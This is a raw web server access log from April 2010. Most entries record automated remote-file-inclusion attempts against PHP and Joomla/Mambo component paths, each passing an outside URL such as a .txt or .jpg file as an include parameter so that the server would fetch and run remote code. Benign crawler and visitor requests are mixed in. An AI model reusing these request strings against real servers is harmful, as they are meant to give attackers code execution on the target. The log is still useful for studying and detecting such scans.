84.40.30.37 - - [16/Apr/2010:03:15:44 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:15:44 -0400] "GET /logs/access_log.Q109121200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:15:46 -0400] "GET /logs/access_log.Q110022500%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:18 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:18 -0400] "GET /config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:18 -0400] "GET /logs/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:03:16:25 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:03:16:25 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:45 -0400] "GET /config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:45 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:45 -0400] "GET /logs/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:47 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:47 -0400] "GET /logs/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:47 -0400] "GET /config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:03:16:47 -0400] "GET /logs/config.php?path_to_root=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:03:16:47 -0400] "GET /config.php?path_to_root=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:03:16:47 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:16:51 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:16:51 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:56 -0400] "GET /logs/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:56 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.197.37 - - [16/Apr/2010:03:16:56 -0400] "GET /config.php?path_to_root=http://www.waterdistrict2.com/pdf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:03:17:03 -0400] "GET /logs/access_log.Q110022500//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:03:18:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.40.30.37 - - [16/Apr/2010:03:18:20 -0400] "GET /logs/access_log.Q109121200%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:18:40 -0400] "GET /logs/access_log.Q109121200%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:03:18:18 -0400] "GET /logs/access_log.Q109111600 HTTP/1.0" 200 4492388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.19.4.18 - - [16/Apr/2010:03:20:26 -0400] "GET /logs/access_log.Q109060400//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
203.19.4.18 - - [16/Apr/2010:03:20:27 -0400] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
203.19.4.18 - - [16/Apr/2010:03:20:29 -0400] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
121.88.4.141 - - [16/Apr/2010:03:21:47 -0400] "GET /logs/access_log.Q109072400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:22:20 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:22:20 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:22:28 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:22:41 -0400] "GET /logs/access_log.Q109072300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs/access_log.Q109102900%20%20//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET //include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET //include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs/access_log.Q109102900%20%20//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET //include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:22:42 -0400] "GET /logs/access_log.Q109102900%20%20//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:23:05 -0400] "GET /logs/access_log.Q109072300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.125.66.131 - - [16/Apr/2010:03:23:08 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.7.127 - - [16/Apr/2010:03:23:25 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.88.4.141 - - [16/Apr/2010:03:23:41 -0400] "GET /logs/access_log.Q109070300///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.19.4.18 - - [16/Apr/2010:03:23:58 -0400] "GET /logs/error_log.Q109060400//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
78.110.50.133 - - [16/Apr/2010:03:24:43 -0400] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:24:44 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:24:44 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:24:47 -0400] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:24:52 -0400] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:03:25:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L029814584AF4780041F0091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [16/Apr/2010:03:26:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.196.39.14 - - [16/Apr/2010:03:28:32 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:28:32 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:28:38 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:28:38 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:28:38 -0400] "GET /logs/access_log.Q109081500%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:28:42 -0400] "GET /logs/access_log.Q109071300//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:28:44 -0400] "GET /logs/access_log.Q109071300//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:28:46 -0400] "GET /logs/access_log.Q109071300//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:28:47 -0400] "GET /logs/access_log.Q110011600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:03:29:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151455103319600808B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.40.30.37 - - [16/Apr/2010:03:29:49 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:29:49 -0400] "GET /logs/access_log.Q109121200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:29:49 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:29:53 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:29:53 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:29:54 -0400] "GET /logs/access_log.Q109121200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:06 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:06 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:06 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:08 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:08 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:30:08 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:30:09 -0400] "GET /logs/access_log.Q109091800//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:30:17 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:30:17 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 232 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:30:17 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:30:18 -0400] "GET /logs/access_log.Q109091800//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:30:18 -0400] "GET /logs/access_log.Q109091800//include/footer.php?_path[counter]=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:30:52 -0400] "GET /logs/access_log.Q109112600%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.248.160.127 - - [16/Apr/2010:03:30:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:30:52 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:30:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:30:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
174.133.122.210 - - [16/Apr/2010:03:31:02 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:31:02 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:31:02 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:32:26 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:32:26 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:32:41 -0400] "GET /logs/access_log.Q109121200%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:32:58 -0400] "GET /logs/access_log.Q109121200%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:03:34:08 -0400] "GET /logs/access_log.Q109112600%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:03:34:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.232 - - [16/Apr/2010:03:34:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0148AA5B695257003A1D00B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
184.73.81.133 - - [16/Apr/2010:03:35:22 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.81.133 - - [16/Apr/2010:03:35:23 -0400] "GET /logs/access_log.Q110022100 HTTP/1.1" 200 3182560 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
67.195.114.252 - - [16/Apr/2010:03:35:14 -0400] "GET /images/ACE_tissue_graft.pdf HTTP/1.0" 200 1518941 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.196.39.14 - - [16/Apr/2010:03:36:28 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:00 -0400] "GET /logs/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:01 -0400] "GET /?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:02 -0400] "GET /?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:02 -0400] "GET /logs/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:03 -0400] "GET /?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:38:03 -0400] "GET /logs/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
60.248.160.127 - - [16/Apr/2010:03:38:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:38:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:38:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:38:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:39:10 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:39:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:39:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.248.160.127 - - [16/Apr/2010:03:39:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)"
60.249.154.222 - - [16/Apr/2010:03:39:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
60.249.154.222 - - [16/Apr/2010:03:39:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
78.110.50.133 - - [16/Apr/2010:03:39:49 -0400] "GET /logs/access_log.Q110040600%20%20/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:39:49 -0400] "GET /logs/access_log.Q110040600%20%20/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:39:49 -0400] "GET /logs/access_log.Q110040600%20%20/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:40:00 -0400] "GET /logs/error_log.Q109090600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:40:00 -0400] "GET /logs/access_log.Q109120500//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.196.39.14 - - [16/Apr/2010:03:40:12 -0400] "GET /logs/access_log.Q110011600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:03:40:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E32A278000A3D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
